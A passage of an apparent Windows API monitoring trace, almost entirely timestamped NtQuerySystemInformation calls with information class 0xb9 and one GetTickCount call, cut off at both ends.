SystemInformation=0xc751dfea10, Length=0x38, ResultLength=0x0) [0209.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe890, Length=0x20, ResultLength=0x0) [0209.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe810, Length=0x20, ResultLength=0x0) [0209.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe810, Length=0x20, ResultLength=0x0) [0209.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe810, Length=0x20, ResultLength=0x0) [0209.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea10, Length=0x38, ResultLength=0x0) [0209.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe890, Length=0x20, ResultLength=0x0) [0209.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe820, Length=0x20, ResultLength=0x0) [0209.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe820, Length=0x20, ResultLength=0x0) [0209.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfed40, Length=0x50, ResultLength=0x0) [0209.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfed40, Length=0x50, ResultLength=0x0) [0209.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfed40, Length=0x50, ResultLength=0x0) [0209.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfec90, Length=0x38, ResultLength=0x0) [0209.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfebd0, Length=0x28, ResultLength=0x0) [0209.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfeae8, Length=0x50, ResultLength=0x0) [0209.941] GetTickCount () returned 0x1175287 [0209.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe9b8, Length=0x58, ResultLength=0x0) [0209.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8d0, Length=0x38, ResultLength=0x0) [0209.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe700, Length=0x28, ResultLength=0x0) [0209.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe700, Length=0x28, ResultLength=0x0) [0209.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe700, Length=0x28, ResultLength=0x0) [0209.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe700, Length=0x28, ResultLength=0x0) [0209.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe770, Length=0x28, ResultLength=0x0) [0209.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8d0, Length=0x38, ResultLength=0x0) [0209.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7f0, Length=0x28, ResultLength=0x0) [0209.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7f0, Length=0x28, ResultLength=0x0) [0209.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8d0, Length=0x38, ResultLength=0x0) [0209.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe750, Length=0x20, ResultLength=0x0) [0209.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x20, ResultLength=0x0) [0209.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x20, ResultLength=0x0) [0209.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x20, ResultLength=0x0) [0209.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8d0, Length=0x38, ResultLength=0x0) [0209.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe750, Length=0x20, ResultLength=0x0) [0209.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6e0, Length=0x20, ResultLength=0x0) [0209.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6e0, Length=0x20, ResultLength=0x0) [0209.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe9b8, Length=0x58, ResultLength=0x0) [0209.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe890, Length=0x38, ResultLength=0x0) [0209.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x28, ResultLength=0x0) [0209.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x28, ResultLength=0x0) [0209.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x28, ResultLength=0x0) [0209.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x28, ResultLength=0x0) [0209.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe740, Length=0x28, ResultLength=0x0) [0209.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe890, Length=0x38, ResultLength=0x0) [0209.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe890, Length=0x38, ResultLength=0x0) [0209.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7c0, Length=0x28, ResultLength=0x0) [0209.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7c0, Length=0x28, ResultLength=0x0) [0209.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe890, Length=0x38, ResultLength=0x0) [0209.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe890, Length=0x38, ResultLength=0x0) [0209.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe630, Length=0x20, ResultLength=0x0) [0209.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0209.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0209.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0209.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe800, Length=0x20, ResultLength=0x0) [0209.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe890, Length=0x38, ResultLength=0x0) [0209.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe720, Length=0x20, ResultLength=0x0) [0209.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6a0, Length=0x20, ResultLength=0x0) [0209.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6a0, Length=0x20, ResultLength=0x0) [0209.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6a0, Length=0x20, ResultLength=0x0) [0209.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe890, Length=0x38, ResultLength=0x0) [0209.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe720, Length=0x20, ResultLength=0x0) [0209.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6a0, Length=0x20, ResultLength=0x0) [0209.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6a0, Length=0x20, ResultLength=0x0) [0209.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6a0, Length=0x20, ResultLength=0x0) [0209.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe890, Length=0x38, ResultLength=0x0) [0209.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe720, Length=0x20, ResultLength=0x0) [0209.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6b0, Length=0x20, ResultLength=0x0) [0209.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6b0, Length=0x20, ResultLength=0x0) [0209.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe9b8, Length=0x58, ResultLength=0x0) [0209.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x58, ResultLength=0x0) [0209.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x38, ResultLength=0x0) [0209.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5d0, Length=0x28, ResultLength=0x0) [0209.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5d0, Length=0x28, ResultLength=0x0) [0209.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5d0, Length=0x28, ResultLength=0x0) [0209.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5d0, Length=0x28, ResultLength=0x0) [0209.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe640, Length=0x28, ResultLength=0x0) [0209.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x38, ResultLength=0x0) [0209.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x28, ResultLength=0x0) [0209.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x28, ResultLength=0x0) [0209.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x38, ResultLength=0x0) [0209.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe620, Length=0x20, ResultLength=0x0) [0209.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5a0, Length=0x20, ResultLength=0x0) [0209.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5a0, Length=0x20, ResultLength=0x0) [0209.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5a0, Length=0x20, ResultLength=0x0) [0209.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x38, ResultLength=0x0) [0209.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe620, Length=0x20, ResultLength=0x0) [0209.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0209.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0209.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x58, ResultLength=0x0) [0209.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x38, ResultLength=0x0) [0209.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5d0, Length=0x28, ResultLength=0x0) [0209.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5d0, Length=0x28, ResultLength=0x0) [0209.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5d0, Length=0x28, ResultLength=0x0) [0209.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 